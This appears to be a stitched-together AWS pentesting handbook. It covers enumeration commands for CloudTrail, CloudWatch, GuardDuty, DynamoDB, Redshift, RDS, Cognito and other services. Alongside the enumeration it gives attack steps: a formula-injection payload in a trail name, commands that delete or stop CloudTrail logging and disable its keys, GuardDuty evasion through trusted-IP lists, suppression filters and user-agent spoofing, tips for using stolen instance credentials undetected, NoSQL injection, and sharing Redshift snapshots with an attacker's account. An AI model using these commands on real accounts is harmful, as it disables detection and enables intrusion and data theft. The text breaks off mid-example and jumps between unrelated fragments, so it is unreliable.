payload = "=cmd|'/C calc'|''"
client = boto3.client('cloudtrail')
response = client.create_trail(
    Name=payload,
    S3BucketName="random"
)
print(response)
https://book.hacktricks.xyz/pentesting-web/formula-injection
This way, an attacker can obtain the ARN of the key without triggering any log. The ARN contains the AWS account ID and the name; since the account IDs and names used by the honeytoken companies are easy to know, this way an attacker can identify if the token is a honeytoken.
This script (https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html) or Pacu (https://github.com/RhinoSecurityLabs/pacu) detect if a key belongs to Canarytokens or SpaceCrab.
The API used by Pacu and the script is now caught, so you need to find a new one. To find a new one you could generate a canary token in https://canarytokens.org/generate
Delete trails
Stop trails
Bucket Modification
Delete the S3 bucket
Change bucket policy to deny any writes from the CloudTrail service
Add lifecycle policy to S3 bucket to delete objects
Disable the kms key used to encrypt the CloudTrail logs
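A few illustrative CLI calls for these disruption techniques (trail name, bucket and key ID are placeholders):
# Delete or stop a trail
aws cloudtrail delete-trail --name <trail_name>
aws cloudtrail stop-logging --name <trail_name>
# Expire the logs quickly with a lifecycle rule on the logging bucket
aws s3api put-bucket-lifecycle-configuration --bucket <cloudtrail_bucket> --lifecycle-configuration '{
  "Rules": [{"ID": "expire-logs", "Status": "Enabled", "Filter": {"Prefix": ""}, "Expiration": {"Days": 1}}]}'
# Disable the KMS key used to encrypt the logs
aws kms disable-key --key-id <key_id>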
Cloudtrail "ransomware"
You could generate an asymmetric key and make CloudTrail encrypt the
data with that key and delete the private key so the cloudtrail contents
cannot be recovered cannot be recovered.
References
https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory
For example, you can monitor the logs and events coming from CloudTrail.
CloudWatch Logs
Allows you to aggregate and monitor logs from AWS services (including CloudTrail) and from applications/systems (the CloudWatch Agent can be installed on a host). Logs can be stored indefinitely (depending on the Log Group settings) and can be exported.
Elements: Log Groups, Log Streams and Log Events.
Agent Installation
You can install agents inside your machines/containers to automatically
send the logs back to CloudWatch.
A log group has many streams. A stream has many events. And inside of
each stream, the events are guaranteed to be in order.
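You can walk that hierarchy from the CLI, for example:
# List log groups, then the streams of a group, then the events of a stream
aws logs describe-log-groups
aws logs describe-log-streams --log-group-name <log_group_name> --order-by LastEventTime --descending
aws logs get-log-events --log-group-name <log_group_name> --log-stream-name <log_stream_name>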
Actions
Enumeration
# Dashboards
aws cloudwatch list-dashboards
aws cloudwatch get-dashboard --dashboard-name <dashboard_name>
# Alarms
aws cloudwatch describe-alarms
aws cloudwatch describe-alarm-history
aws cloudwatch describe-alarms-for-metric --metric-name <metric_name> --namespace <namespace>
aws cloudwatch describe-alarms-for-metric --metric-name IncomingLogEvents --namespace AWS/Logs
# Anomaly Detections
aws cloudwatch describe-anomaly-detectors
aws cloudwatch describe-insight-rules
# Logs
aws logs tail "<log_group_name>" --follow
aws logs get-log-events --log-group-name "<log_group_name>" --log-stream-name "<log_stream_name>" --output text > <output_file>
# Events enumeration
aws events list-rules
aws events describe-rule --name <name>
aws events list-targets-by-rule --rule <name>
aws events list-archives
aws events describe-archive --archive-name <name>
aws events list-connections
aws events describe-connection --name <name>
aws events list-endpoints
aws events describe-endpoint --name <name>
aws events list-event-sources
aws events describe-event-source --name <name>
aws events list-replays
aws events list-api-destinations
aws events list-event-buses
Avoid Detection
events:ListRules, events:ListTargetsByRule, events:PutRule, events:RemoveTargets
GuardDuty populates its findings to Cloudwatch Events on a 5 minute
cadence. Modifying the Event pattern or Targets for an event may reduce
GuardDuty's ability to alert and trigger auto-remediation of findings,
especially where the remediation is triggered in a member account as
GuardDuty administrator protections do not extend to the Cloudwatch
events in the member account.
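As an illustration, with those permissions an attacker could blind such auto-remediation by removing the rule targets or overwriting the event pattern (rule name and target ID are placeholders):
aws events list-rules
aws events list-targets-by-rule --rule <rule_name>
aws events remove-targets --rule <rule_name> --ids <target_id>
aws events put-rule --name <rule_name> --event-pattern '{"source": ["aws.nothing"]}'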
Functioning
When changes are made, for example to a security group or a bucket access control list, they fire off an event that is picked up by AWS Config.
Config stores everything in an S3 bucket.
Depending on the setup, as soon as something changes it could trigger a lambda function, OR a lambda function could be scheduled to periodically look through the AWS Config settings.
The lambda feeds back to Config.
If a rule has been broken, Config fires off an SNS notification.
Config Rules
Config rules are a great way to help you enforce specific compliance
checks and controls across your resources, and allows you to adopt an
ideal deployment specification for each of your resource types. Each rule is
essentially a lambda function that when called upon evaluates the
resource and carries out some simple logic to determine the compliance
result with the rule. Each time a change is made to one of your supported
resources, AWS Config will check the compliance against any config
rules that you have in place. AWS has a number of predefined rules that fall under the security umbrella and are ready to use. For example, Rds-storage-encrypted (checks whether storage encryption is activated by your RDS database instances) or Encrypted-volumes (checks whether any EBS volumes in an attached state are encrypted).
AWS Managed rules: a set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own, as there is a chance that the rule may already exist.
Custom rules: you can create your own rules to check specific custom configurations.
There is a limit of 50 config rules per region before you need to contact AWS for an increase. Non-compliant results are NOT deleted.
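Some example CLI calls to enumerate Config rules and their compliance state:
aws configservice describe-configuration-recorders
aws configservice describe-configuration-recorder-status
aws configservice describe-config-rules
aws configservice describe-compliance-by-config-rule
aws configservice get-compliance-details-by-config-rule --config-rule-name <rule_name>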
Budgets
Budgets help to manage costs and usage. You can get alerted when a threshold is reached. They can also be used for non-cost-related monitoring, like the usage of a service (how many GB are used in a particular S3 bucket?).
It can group and protect specific resources together, for example, all
resources with a particular tag or all of your CloudFront distributions. One
key benefit of Firewall Manager is that it automatically protects certain
resources that are added to your account as they become active.
Finding summary:
Finding type
Severity: 7-8.9 High, 4-6.9 Medium, 0.1-3.9 Low
Region
Account ID
Resource ID
Time of detection
Which threat list was used
Resource affected
Action
Actor: Ip address, port and domain
Additional Information
You pay for the processing of your log files: per 1 million events per month from CloudTrail and per GB of analysed logs from VPC Flow Logs.
guardduty:ListDetectors, guardduty:ListIPSets, iam:PutRolePolicy, (guardduty:CreateIPSet | guardduty:UpdateIPSet)
An attacker could create or update GuardDuty's Trusted IP list, including
their own IP on the list. Any IPs in a trusted IP list will not have any
Cloudtrail or VPC flow log alerts raised against them.
guardduty:CreateFilter
Newly created GuardDuty findings can be automatically archived via Suppression Rules. An adversary could use filters to automatically archive findings they are likely to generate.
guardduty:DeletePublishingDestination
An adversary could disable alerting simply by deleting the destination of the alerts.
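Illustrative CLI calls for the three techniques above (detector ID, bucket and destination ID are placeholders):
# Whitelist the attacker IP in a Trusted IP list
aws guardduty list-detectors
aws guardduty create-ip-set --detector-id <detector_id> --name trusted --format TXT \
    --location https://<bucket>.s3.amazonaws.com/ips.txt --activate
# Auto-archive the findings you expect to generate
aws guardduty create-filter --detector-id <detector_id> --name quiet --action ARCHIVE \
    --finding-criteria '{"Criterion": {"type": {"Eq": ["UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS"]}}}'
# Remove the publishing destination of the findings
aws guardduty delete-publishing-destination --detector-id <detector_id> --destination-id <destination_id>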
Pentest Findings
GuardDuty detects AWS API requests coming from common penetration testing OSs (such as Kali) and triggers a PenTest finding. It's detected via the user agent name that is passed in the API request. Therefore, modifying the user agent makes it possible to prevent GuardDuty from detecting the attack.
Using an OS like Ubuntu, Mac or Windows will prevent this alert from triggering.
To prevent this you can search for the script session.py in the botocore package and modify the user agent there. In Kali Linux it's in /usr/local/lib/python3.7/dist-packages/botocore/session.py .
If you need to connect through Tor you can bypass this using bridges. But obviously it would be better to just not use Tor at all to connect.
To use a bridge you can use Obfs4 ( apt install tor obfs4proxy ) and get a bridge address from bridges.torproject.org.
From there, create a torrc file with something similar to:
UseBridges 1
Bridge obfs4 <IP ADDRESS>:<PORT> <FINGERPRINT> cert=<cert_string> iat-mode=0
ClientTransportPlugin obfs4 exec /bin/obfs4proxy
Run tor -f torrc and you can connect to the regular socks5 proxy on port 9050.
Credential Exfiltration Detection
If you steal EC2 creds from the metadata service and use them outside the AWS infrastructure, the alert
UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS is triggered.
Moreover, if you use your own EC2 instance to use the stolen credentials, the alert
UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS is triggered.
Another way to bypass this alert is to simply use the stolen credentials in the same machine they were stolen from, or in one from the same account.
References
https://hackingthe.cloud/aws/avoiding-detection/guardduty-pentest/
https://hackingthe.cloud/aws/avoiding-detection/guardduty-tor-client/
https://hackingthe.cloud/aws/avoiding-detection/modify-guardduty-
config/
https://hackingthe.cloud/aws/avoiding-detection/steal-keys-undetected/
These are the tests that AWS Inspector allows you to perform:
CVEs
CIS Benchmarks
Security Best practices
Network Reachability
You can make any of those run on the EC2 machines you decide.
Rule package: Contains a number of individual rules that are checked against an EC2 instance when an assessment is run. Each one also has a severity (high, medium, low, informational). The possibilities are:
Once you have configured the Amazon Inspector Role, the AWS Agents are
Installed, the target is configured and the template is configured, you will be
able to run it. An assessment run can be stopped, resumed, or deleted.
Note that nowadays AWS already allows you to auto-create all the necessary configuration and even automatically install the agents inside the EC2 instances.
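From the CLI, assessments and findings can be enumerated, for example (classic Inspector shown; newer accounts may use inspector2 instead):
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-assessment-runs
aws inspector list-findings
aws inspector describe-findings --finding-arns <finding_arn>
# Inspector v2
aws inspector2 list-findings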
Reporting
Telemetry: data that is collected from an instance, detailing its
configuration, behavior and processes during an assessment run. Once
collected, the data is then sent back to Amazon Inspector in near-real-time
over TLS where it is then stored and encrypted on S3 via an ephemeral
KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data
in memory, and analyzes it against any rules packages used for that
assessment to generate the findings.
Assessment Report: Provide details on what was assessed and the results
of the assessment.
This is useful to avoid data leaks, as Macie will detect if you are exposing personal information to the Internet.
Anonymized access
Config compliance
Credential Loss
Data compliance
Files hosting
Identity enumeration
Information loss
Location anomaly
Open permissions
Privilege escalation
Ransomware
Service disruption
Suspicious access
Dashboard categorization:
Identity types:
The final risk of a file will be the highest risk found between those 4
categories
The research function allows you to create your own queries against all Amazon Macie data and perform a deep-dive analysis of the data. You can filter results based on: CloudTrail data, S3 bucket properties and S3 object characteristics.
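Some enumeration examples using the Macie v2 API (a sketch):
aws macie2 get-macie-session # Is Macie enabled & basic config
aws macie2 list-findings
aws macie2 get-findings --finding-ids <finding_id>
aws macie2 list-classification-jobs
aws macie2 describe-classification-job --job-id <job_id>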
The full power and potential of AWS Trusted Advisor is only really
available if you have a business or enterprise support plan with AWS.
Without either of these plans, then you will only have access to six core
checks that are freely available to everyone. These free core checks are split
between the performance and security categories, with the majority of them
being related to security. These are the 6 checks: service limits, Security
Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots,
Amazon RDS Public Snapshots, IAM Use, and MFA on root account.
Trusted advisor can send notifications and you can exclude items from it.
Trusted advisor data is automatically refreshed every 24 hours, but you
can perform a manual one 5 mins after the previous one.
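With a Business or Enterprise support plan the checks can also be queried through the Support API, e.g.:
aws support describe-trusted-advisor-checks --language en
aws support describe-trusted-advisor-check-result --check-id <check_id> --language en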
Checks
Categories:
1. Cost Optimization
2. Security
3. Fault Tolerance
4. Performance
5. Service Limits
Core Checks:
1. S3 Bucket Permissions
2. Security Groups - Specific Ports Unrestricted
3. IAM Use
4. MFA on Root Account
5. EBS Public Snapshots
6. RDS Public Snapshots
7. Service Limits
Security Checks
Security group open access to specific high-risk ports
Security group unrestricted access
Open write and List access to S3 buckets
MFA on root account
Overly permissive RDS security group
Use of cloudtrail
Route 53 MX records have SPF records
ELB with poor or missing HTTPS config
ELB security groups missing or overly permissive
CloudFront cert checks - expired, weak, misconfigured
IAM access keys not rotated in last 90 days
Exposed access keys on GitHub etc
Public EBS or RDS snapshots
Missing or weak IAM password policy
References
https://cloudsecdocs.com/aws/services/logging/other/#trusted-advisor
Conditions
Conditions allow you to specify which elements of the incoming HTTP or HTTPS request you want WAF to monitor (XSS, GEO - filtering by location -, IP addresses, size constraints, SQL injection attacks, string and regex matching). Note that if you are restricting a country from CloudFront, the request won't even arrive at the WAF.
You can have 100 conditions of each type, such as Geo Match or size constraints; however, Regex is the exception to this rule, where only 10 Regex conditions are allowed (this limit can be increased). You are able to have 100 rules and 50 Web ACLs per AWS account. You are limited to 5 rate-based rules per account. Finally, you can have 10,000 requests per second when using WAF within your Application Load Balancer.
Rules
Using these conditions you can create rules: for example, block the request if 2 conditions are met. When creating your rule you will be asked to select a Rule Type: Regular Rule or Rate-Based Rule.
The only difference between a rate-based rule and a regular rule is that rate-based rules count the number of requests that are being received from a particular IP address over a time period of five minutes.
When you select a rate-based rule option, you are asked to enter the maximum number of requests from a single IP within a five-minute time frame. When the count limit is reached, all other requests from that same IP address are then blocked. If the request rate falls back below the rate limit specified, the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it must be set to a value above 2000. Any request under this limit is considered a Regular Rule.
Actions
An action is applied to each rule, these actions can either be Allow, Block
or Count.
If an incoming request does not meet any rule within the Web ACL then the request takes the default action specified, which can be either Allow or Block. An important point to make about these rules is that they are executed in the order that they are listed within a Web ACL, so be careful to architect this order correctly for your rule base; typically these are ordered as shown:
CloudWatch
WAF CloudWatch metrics are reported in one minute intervals by default
and are kept for a two week period. The metrics monitored are
AllowedRequests, BlockedRequests, CountedRequests, and
PassedRequests.
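Web ACLs, rules and associated resources can be enumerated from the CLI, for example with WAFv2 (scope is REGIONAL or CLOUDFRONT):
aws wafv2 list-web-acls --scope REGIONAL
aws wafv2 get-web-acl --scope REGIONAL --name <name> --id <id>
aws wafv2 list-ip-sets --scope REGIONAL
aws wafv2 list-rule-groups --scope REGIONAL
aws wafv2 list-resources-for-web-acl --web-acl-arn <web_acl_arn>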
DynamoDB
Redshift
DocumentDB
Relational Database (RDS)
Enumeration
# Tables
aws dynamodb list-tables
aws dynamodb describe-table --table-name <t_name> # Get metadata info
## The primary key and sort key will appear inside the KeySchema field
## Read
aws dynamodb scan --table-name <t_name> # Get data inside the table
# Query against the table
aws dynamodb query \
    --table-name MusicCollection \
    --projection-expression "SongTitle" \
    --key-condition-expression "Artist = :v1" \
    --expression-attribute-values file://expression-attributes.json \
    --return-consumed-capacity TOTAL
# Backups
aws dynamodb list-backups
aws dynamodb describe-backup --backup-arn <arn>
aws --profile prd dynamodb describe-continuous-backups --table-name <t_name>
# Global tables
aws dynamodb list-global-tables
aws dynamodb describe-global-table --global-table-name <name>
# Exports
aws dynamodb list-exports
aws --profile prd dynamodb describe-export --export-arn <arn>
# Misc
aws dynamodb describe-endpoints #Dynamodb endpoints
GUI
There is a GUI for local Dynamo services like DynamoDB Local, dynalite,
localstack, etc, that could be useful:
https://github.com/aaronshaf/dynamodb-admin
Privesc
aws-dynamodb-privesc.md
DynamoDB Injection
SQL Injection
There are ways to access DynamoDB data with SQL syntax, therefore,
typical SQL injections are also possible.
https://book.hacktricks.xyz/pentesting-web/sql-injection
NoSQL Injection
In DynamoDB different conditions can be used to retrieve data and, like in a common NoSQL injection, if it's possible to chain more conditions you could obtain hidden data (or dump the whole table). You can find the conditions supported by DynamoDB here: https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html. Note that different conditions are supported depending on whether the data is being accessed via query or via scan .
If you can change the comparison performed or add new ones, you could retrieve more data. For example, instead of an "EQ" condition searching for the ID 1000, a condition looking for all the data with an Id string greater than 0 would return everything.
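As an illustration of that idea, with direct API access the legacy scan-filter parameter accepts arbitrary comparison operators (table and attribute names are placeholders):
# "GT 0" instead of "EQ <id>" returns every item
aws dynamodb scan --table-name <t_name> \
    --scan-filter '{"Id": {"ComparisonOperator": "GT", "AttributeValueList": [{"S": "0"}]}}'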
:property Injection
Some SDKs allow using a string indicating the filtering to be performed, like:
new ScanSpec().withProjectionExpression("UserName")
    .withFilterExpression(user_input + " = :value and Password = :password")
    .withValueMap(valueMap)
You need to know that in DynamoDB the tokens used to substitute an attribute value in filter expressions while scanning the items must begin with the : character. Such tokens will be replaced with the actual attribute value at runtime.
Therefore, a login like the previous one can be bypassed with something like:
Encryption for your cluster can only happen during its creation, and once
encrypted, the data, metadata, and any snapshots are also encrypted. The
tiering level of encryption keys are as follows, tier one is the master key,
tier two is the cluster encryption key, the CEK, tier three, the database
encryption key, the DEK, and finally tier four, the data encryption keys
themselves.
KMS
During the creation of your cluster, you can either select the default KMS
key for Redshift or select your own CMK, which gives you more flexibility
over the control of the key, specifically from an auditable perspective.
The default KMS key for Redshift is automatically created by Redshift the
first time the key option is selected and used, and it is fully managed by
AWS.
This KMS key is then encrypted with the CMK master key, tier one. This
encrypted KMS data key is then used as the cluster encryption key, the
CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored
separately from the cluster. Redshift then sends this encrypted CEK to the
cluster over a secure channel where it is stored in memory.
Redshift then requests KMS to decrypt the CEK, tier two. This decrypted
CEK is then also stored in memory. Redshift then creates a random
database encryption key, the DEK, tier three, and loads that into the
memory of the cluster. The decrypted CEK in memory then encrypts the
DEK, which is also stored in memory.
This encrypted DEK is then sent over a secure channel and stored in
Redshift separately from the cluster. Both the CEK and the DEK are now
stored in memory of the cluster both in an encrypted and decrypted form.
The decrypted DEK is then used to encrypt data keys, tier four, that are
randomly generated by Redshift for each data block in the database.
You can use AWS Trusted Advisor to monitor the configuration of your
Amazon S3 buckets and ensure that bucket logging is enabled, which can
be useful for performing security audits and tracking usage patterns in S3.
CloudHSM
Using Redshift with CloudHSM
When working with CloudHSM to perform your encryption, firstly you
must set up a trusted connection between your HSM client and Redshift
while using client and server certificates.
You must then configure Redshift with the following details of your HSM
client: the HSM IP address, the HSM partition name, the HSM partition
password, and the public HSM server certificate, which is encrypted by
CloudHSM using an internal master key. Once this information has been
provided, Redshift will confirm and verify that it can connect and access
development partition.
During the rotation, Redshift will rotate the CEK for your cluster and for
any backups of that cluster. It will rotate a DEK for the cluster but it's not
possible to rotate a DEK for the snapshots stored in S3 that have been
encrypted using the DEK. It will put the cluster into a state of 'rotating keys'
until the process is completed when the status will return to 'available'.
Enumeration
# Get clusters
aws redshift describe-clusters
## Get if publicly accessible
aws redshift describe-clusters | jq -r ".Clusters[].PubliclyAccessible"
## Get DB username to login
aws redshift describe-clusters | jq -r ".Clusters[].MasterUsername"
## Get endpoint
aws redshift describe-clusters | jq -r ".Clusters[].Endpoint"
## Public addresses of the nodes
aws redshift describe-clusters | jq -r ".Clusters[].ClusterNodes[].PublicIPAddress"
## Get IAM roles of the clusters
aws redshift describe-clusters | jq -r ".Clusters[].IamRoles"
# Get credentials
aws redshift get-cluster-credentials --db-user <username> --cluster-identifier <cluster-id>
## By default, the temporary credentials expire in 900 seconds. You can optionally specify a duration between 900 seconds (15 minutes) and 3600 seconds (60 minutes).
aws redshift get-cluster-credentials-with-iam --cluster-identifier <cluster-id>
## Gives creds to access redshift with the IAM redshift permissions given to the current AWS account
## More in https://docs.aws.amazon.com/redshift/latest/mgmt/redshift-iam-access-control-identity-based.html
# Authentication profiles
aws redshift describe-authentication-profiles
# Snapshots
aws redshift describe-cluster-snapshots
# Scheduled actions
aws redshift describe-scheduled-actions
# Connect
# The redshift instance must be publicly available (not by default), the sg needs to allow inbound connections to the port and you need creds
psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U admin -d dev -p 5439
Privesc
aws-redshift-privesc.md
Persistence
The following actions allow to grant access to other AWS accounts to the
cluster:
authorize-endpoint-access
authorize-snapshot-access
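For example (account ID, snapshot and cluster identifiers are placeholders):
# Allow another account to restore a snapshot of the cluster
aws redshift authorize-snapshot-access --snapshot-identifier <snapshot_id> --account-with-restore-access <attacker_account_id>
# Allow another account to access the cluster through a managed VPC endpoint
aws redshift authorize-endpoint-access --cluster-identifier <cluster_id> --account <attacker_account_id>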
Enumeration
# Parameter groups
aws docdb describe-db-cluster-parameter-groups
aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name <param_group_name>
# Snapshots
aws docdb describe-db-cluster-snapshots
aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier <snap_id>
NoSQL Injection
As DocumentDB is a MongoDB compatible database, you can imagine it's
also vulnerable to common NoSQL injection attacks:
https://book.hacktricks.xyz/pentesting-web/nosql-injection
DocumentDB
aws-documentdb-enum.md
RDS
RDS allows you to set up a relational database using a number of
different engines such as MySQL, Oracle, SQL Server, PostgreSQL, etc.
During the creation of your RDS database instance, you have the
opportunity to Enable Encryption at the Configure Advanced Settings
screen under Database Options and Enable Encryption.
By enabling your encryption here, you are enabling encryption at rest for
your storage, snapshots, read replicas and your back-ups. Keys to
manage this encryption can be issued by using KMS. It's not possible to
add this level of encryption after your database has been created. It has to
be done during its creation.
If you want to use the TDE method, then you must first ensure that the
database is associated to an option group. Option groups provide default
settings for your database and help with management which includes some
security features. However, option groups only exist for the following
database engines and versions.
Once the database is associated with an option group, you must ensure that
the Oracle Transparent Data Encryption option is added to that group. Once
this TDE option has been added to the option group, it cannot be removed.
TDE can use two different encryption modes, firstly, TDE tablespace
encryption which encrypts entire tables and, secondly, TDE column
encryption which just encrypts individual elements of the database.
Enumeration
# Get DBs
aws rds describe-db-clusters
aws rds describe-db-cluster-endpoints
aws rds describe-db-instances
aws rds describe-db-security-groups
# Find snapshots
aws rds describe-db-snapshots
aws rds describe-db-snapshots --include-public --snapshot-type public
## Restore snapshot as new instance
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier <ID> --db-snapshot-identifier <ID> --availability-zone us-west-2a
# Proxies
aws rds describe-db-proxy-endpoints
aws rds describe-db-proxy-target-groups
aws rds describe-db-proxy-targets
Privesc
aws-rds-privesc.md
Unauthenticated Access
aws-rds-unauthenticated-enum.md
SQL Injection
As RDS engines use SQL, typical SQL injections in the applications querying the database are also possible.
https://book.hacktricks.xyz/pentesting-web/sql-injection
Enumeration
# Generic info
aws apigateway get-account
aws apigateway get-domain-names
aws apigateway get-usage-plans
aws apigateway get-vpc-links
aws apigateway get-client-certificates
# Enumerate APIs
aws apigateway get-rest-apis
## Get stages
aws apigateway get-stages --rest-api-id <id>
## Get resources
aws apigateway get-resources --rest-api-id <id>
## Get API resource action per HTTP verb
aws apigateway get-method --http-method GET --rest-api-id <api-id> --resource-id <resource-id>
## Call API
https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>
## API authorizers
aws apigateway get-authorizers --rest-api-id <id>
## Models
aws apigateway get-models --rest-api-id <id>
## More info
aws apigateway get-gateway-responses --rest-api-id <id>
aws apigateway get-request-validators --rest-api-id <id>
aws apigateway get-deployments --rest-api-id <id>
You will note that an API expects an IAM-authorised request when it answers with a response such as {"message":"Missing Authentication Token"}.
One easy way to generate the token expected by the application is to use the Authorization type AWS Signature inside Postman.
Set the accessKey and the secretKey of the account you want to use and you can now authenticate against the API endpoint. It will generate an Authorization header such as:
AWS4-HMAC-SHA256 Credential=AKIAYY7XU6ECUDOTWB7W/20220726/us-east-1/execute-api/aws4_request, SignedHeaders=host;x-amz-date, Signature=9f35579fa85c0d089c5a939e3d711362e92641e8c14cc571df8c71b4bc62a5c2
Note that in other cases the Authorizer might have been badly coded and just sending anything inside the Authorization header will allow you to see the hidden content.
The API Key just needs to be included inside an HTTP header called x-api-key .
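If you prefer the terminal, recent curl versions can also sign the request (SigV4), and the API key is just a header; both examples assume placeholder values:
# IAM (SigV4) authorized call (curl >= 7.75)
curl --aws-sigv4 "aws:amz:us-east-1:execute-api" \
    --user "$AWS_ACCESS_KEY_ID:$AWS_SECRET_ACCESS_KEY" \
    "https://<api-id>.execute-api.us-east-1.amazonaws.com/<stage>/<resource>"
# (add -H "x-amz-security-token: $AWS_SESSION_TOKEN" if using temporary credentials)
# API key protected endpoint
curl -H "x-api-key: <api_key>" "https://<api-id>.execute-api.us-east-1.amazonaws.com/<stage>/<resource>"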
Privesc
aws-apigateway-privesc.md
Unauthenticated Access
aws-api-gateway-unauthenticated-enum.md
Enumeration
# Stacks
aws cloudformation list-stacks
aws cloudformation describe-stacks # You could find sensitive information here
aws cloudformation list-stack-resources --stack-name <name>
# Export
aws cloudformation list-exports
aws cloudformation list-imports --export-name <x_name>
# Stack Sets
aws cloudformation list-stack-sets
aws cloudformation describe-stack-set --stack-set-name <name>
aws cloudformation list-stack-instances --stack-set-name <name>
aws cloudformation list-stack-set-operations --stack-set-name <name>
aws cloudformation list-stack-set-operation-results --stack-set-name <name> --operation-id <id>
Privesc
In the following page you can check how to abuse cloudformation
permissions to escalate privileges:
aws-cloudformation-privesc
Post-Exploitation
Check for secrets or sensitive information in the template, parameters & output of each CloudFormation stack.
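For example, to dump the parameters, outputs and template of a stack and grep them for secrets:
aws cloudformation describe-stacks --stack-name <name> --query "Stacks[0].[Parameters,Outputs]"
aws cloudformation get-template --stack-name <name>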
Codestar
AWS CodeStar is a service for creating, managing, and working with
software development projects on AWS. You can quickly develop, build,
and deploy applications on AWS with an AWS CodeStar project. An AWS
CodeStar project creates and integrates AWS services for your project
development toolchain. Depending on your choice of AWS CodeStar
project template, that toolchain might include source control, build,
deployment, virtual servers or serverless resources, and more. AWS
CodeStar also manages the permissions required for project users
(called team members).
Enumeration
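A few example enumeration commands (a sketch):
aws codestar list-projects
aws codestar describe-project --id <project_id>
aws codestar list-resources --project-id <project_id>
aws codestar list-team-members --project-id <project_id>
aws codestar list-user-profiles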
Privesc
In the following page you can check how to abuse codestar permissions to
escalate privileges:
aws-codestar-privesc
Since this is a physical device dedicated to you, the keys are stored on the
device. Keys need to either be replicated to another device, backed up to
offline storage, or exported to a standby appliance. This device is not
backed by S3 or any other service at AWS like KMS.
CloudHSM is an enterprise-class service for secure key storage and can be used as a root of trust for an enterprise. It can store private keys in PKI and certificate authority keys in X509 implementations, in addition to symmetric keys used in symmetric algorithms such as AES. KMS, by contrast, stores and physically protects symmetric keys only (it cannot act as a certificate authority), so if you need to store PKI and CA keys, a CloudHSM (or two, or three) could be your solution.
With CloudHSM only you have access to the keys and without going into
too much detail, with CloudHSM you manage your own keys. With KMS,
you and Amazon co-manage your keys. AWS does have many policy
safeguards against abuse and still cannot access your keys in either
solution. The main distinction is compliance as it pertains to key ownership
and management, and with CloudHSM, this is a hardware appliance that
you manage and maintain with exclusive access to you and only you.
CloudHSM Suggestions
1. Always deploy CloudHSM in an HA setup with at least two
appliances in separate availability zones, and if possible, deploy a
third either on premise or in another region at AWS.
2. Be careful when initializing a CloudHSM. This action will destroy
the keys, so either have another copy of the keys or be absolutely sure
you do not and never, ever will need these keys to decrypt any data.
3. CloudHSM only supports certain versions of firmware and
software. Before performing any update, make sure the firmware and
or software is supported by AWS. You can always contact AWS
support to verify if the upgrade guide is unclear.
4. The network configuration should never be changed. Remember,
it's in a AWS data center and AWS is monitoring base hardware for
you. This means that if the hardware fails, they will replace it for you,
but only if they know it failed.
5. The SysLog forward should not be removed or changed. You can
always add a SysLog forwarder to direct the logs to your own
collection tool.
6. The SNMP configuration has the same basic restrictions as the network and SysLog forwarder configuration. It should not be changed or removed. An additional SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
7. Another interesting best practice from AWS is not to change the NTP
configuration. It is not clear what would happen if you did, so keep in
mind that if you don't use the same NTP configuration for the rest of
your solution then you could have two time sources. Just be aware of
this and know that the CloudHSM has to stay with the existing NTP
source.
The initial launch charge for CloudHSM is $5,000 to allocate the hardware
appliance dedicated for your use, then there is an hourly charge associated
with running CloudHSM that is currently at $1.88 per hour of operation, or
approximately $1,373 per month.
Enumeration
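A few example enumeration commands for the CloudHSM v2 API:
aws cloudhsmv2 describe-clusters
aws cloudhsmv2 describe-backups
aws cloudhsmv2 list-tags --resource-id <cluster_id>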
The log files capture data over a period of time; the number of log files generated depends on the amount of requests received by Amazon CloudFront for that distribution. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered once the log file is full. Amazon CloudFront retains these logs until they are ready to be delivered to S3. Depending on the size of these log files, this delivery can take between one and 24 hours.
Functions
You can create functions in CloudFront. These functions have their endpoint defined in CloudFront and run declared NodeJS code. This code runs inside a sandbox on an AWS-managed machine (you would need a sandbox bypass to escape to the underlying OS).
As the functions aren't run in the user's AWS account, no IAM role is attached, so no direct privesc is possible by abusing this feature.
Enumeration
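Some example enumeration commands for CloudFront:
aws cloudfront list-distributions
aws cloudfront get-distribution-config --id <distribution_id>
aws cloudfront list-functions
aws cloudfront describe-function --name <function_name>
aws cloudfront get-function --name <function_name> function.js # Downloads the function code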
The two main components of Amazon Cognito are user pools and identity
pools. User pools are user directories that provide sign-up and sign-in
options for your app users. Identity pools enable you to grant your users
access to other AWS services.
User pools
To learn what a Cognito User Pool is, check:
cognito-user-pools.md
Identity pools
To learn what a Cognito Identity Pool is, check:
cognito-identity-pools.md
Enumeration
# List Identity Pools
aws cognito-identity list-identity-pools --max-results 60
aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
aws cognito-identity list-identities --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" --max-results 60
aws cognito-identity get-identity-pool-roles --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
# Get credentials
## Get one ID
aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
## Get creds for that id
aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374" [--logins ...] # Use logins to get the authenticated user IAM role
aws cognito-identity get-open-id-token --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"
# User Pools
## Get pools
aws cognito-idp list-user-pools --max-results 60
## Get users
aws cognito-idp list-users --user-pool-id <user-pool-id>
## Get groups
aws cognito-idp list-groups --user-pool-id <user-pool-id>
## Get users in a group
aws cognito-idp list-users-in-group --user-pool-id <user-pool-id> --group-name <group-name>
